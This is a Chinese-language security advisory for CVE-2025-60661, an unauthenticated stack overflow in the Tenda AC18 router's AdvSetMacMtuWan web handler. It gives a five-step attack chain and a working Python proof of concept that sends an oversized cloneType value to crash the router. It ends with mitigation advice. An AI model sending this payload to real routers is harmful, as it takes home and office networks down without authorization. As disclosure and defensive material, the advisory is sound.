CVE-2025-60661 Tenda AC18路由器栈溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60661

漏洞类型

栈缓冲区溢出

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18

漏洞概述

CVE-2025-60661是Tenda AC18路由器（固件版本V15.03.05.19）中存在的一个栈缓冲区溢出漏洞。该漏洞位于路由器的Web管理界面处理逻辑中，具体存在于fromAdvSetMacMtuWan函数中。攻击者可以通过精心构造的cloneType参数触发栈溢出，导致路由器进程崩溃或执行任意代码。CVSS评分为5.3，属于中危级别。该漏洞可通过网络远程利用，无需认证和用户交互，影响路由器的可用性。由于Tenda AC18是一款广泛使用的家用无线路由器，该漏洞对家庭网络和小型办公网络构成潜在威胁。攻击者可利用此漏洞对路由器发起拒绝服务攻击（DoS），使目标设备失去响应能力，从而影响整个网络的正常运行。在某些情况下，攻击者还可能通过栈溢出实现远程代码执行，获取路由器的完全控制权，进一步对内网设备进行渗透攻击。

技术细节

该漏洞的根源在于Tenda AC18路由器固件V15.03.05.19中fromAdvSetMacMtuWan函数对cloneType参数的处理逻辑存在缺陷。当用户通过Web管理界面配置WAN口的MAC地址克隆和MTU设置时，路由器会调用fromAdvSetMacMtuWan函数处理传入的cloneType参数。然而，该函数未对cloneType参数的长度进行充分的边界检查，攻击者可以传入超长的字符串数据，超出函数栈缓冲区的大小限制，从而覆盖栈上的返回地址和其他关键数据。

利用方式方面，攻击者无需任何认证即可通过网络发送特制的HTTP请求，访问路由器的Web管理接口，提交包含超长cloneType参数的恶意数据。当路由器处理该请求时，栈缓冲区被溢出，可能导致以下后果：1）程序崩溃，路由器Web服务不可用（拒绝服务攻击）；2）通过精心构造溢出数据，控制程序执行流，执行任意代码；3）获取路由器管理权限，修改路由器配置或植入后门。

由于该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N）和用户交互（UI:N），且对可用性有低影响（A:L），因此虽然被评为中危，但在实际网络环境中仍然具有较高的利用价值。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者通过扫描网络发现目标Tenda AC18路由器，确认其固件版本为V15.03.05.19，并识别其开放的Web管理端口（通常为80或8080）

STEP 2

步骤2：构造恶意请求

攻击者构造包含超长cloneType参数的HTTP POST请求，目标为/goform/AdvSetMacMtuWan端点，触发fromAdvSetMacMtuWan函数中的栈缓冲区溢出

STEP 3

步骤3：发送攻击载荷

攻击者通过局域网或互联网向路由器发送恶意HTTP请求，无需任何认证即可触发漏洞

STEP 4

步骤4：触发栈溢出

路由器处理请求时，cloneType参数的超长数据溢出栈缓冲区，覆盖返回地址，可能导致程序崩溃或代码执行

STEP 5

步骤5：影响利用

成功利用后，攻击者可实现拒绝服务攻击使路由器不可用，或在特定条件下执行任意代码获取路由器控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60661 PoC - Tenda AC18 Stack Overflow via cloneType parameter
# Vulnerability: Stack buffer overflow in fromAdvSetMacMtuWan function
# Affected: Tenda AC18 V15.03.05.19

import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
PORT = 80

# Construct the overflow payload
# cloneType parameter is passed without proper length validation
# causing stack buffer overflow in fromAdvSetMacMtuWan
payload = "A" * 1000  # Overflow buffer with excessive data

# Build the malicious request to the router's web interface
url = f"http://{TARGET}:{PORT}/goform/AdvSetMacMtuWan"

data = {
    "cloneType": payload,
    "mac": "00:11:22:33:44:55",
    "mtu": "1500"
}

print(f"[*] Targeting Tenda AC18 at {TARGET}")
print(f"[*] Sending stack overflow payload via cloneType parameter...")

try:
    response = requests.post(url, data=data, timeout=10)
    print(f"[*] Response status: {response.status_code}")
    print("[*] Payload sent successfully")
except requests.exceptions.RequestException as e:
    print(f"[!] Target may have crashed (DoS achieved): {e}")

print("[*] Check if router is still responsive")

影响范围

Tenda AC18 V15.03.05.19

防御指南

临时缓解措施

在官方补丁发布之前，建议用户采取以下临时缓解措施：1）将路由器Web管理界面的访问限制在可信的内网环境中，避免从公网直接访问管理界面；2）修改路由器的默认管理端口，减少被自动化攻击工具发现的风险；3）启用路由器的访问控制列表（ACL），限制只有特定IP地址可以访问管理界面；4）监控路由器的异常日志和网络流量，及时发现潜在的攻击行为；5）如非必要，可暂时关闭路由器的远程管理功能；6）考虑使用独立的网络设备（如防火墙）保护路由器管理接口。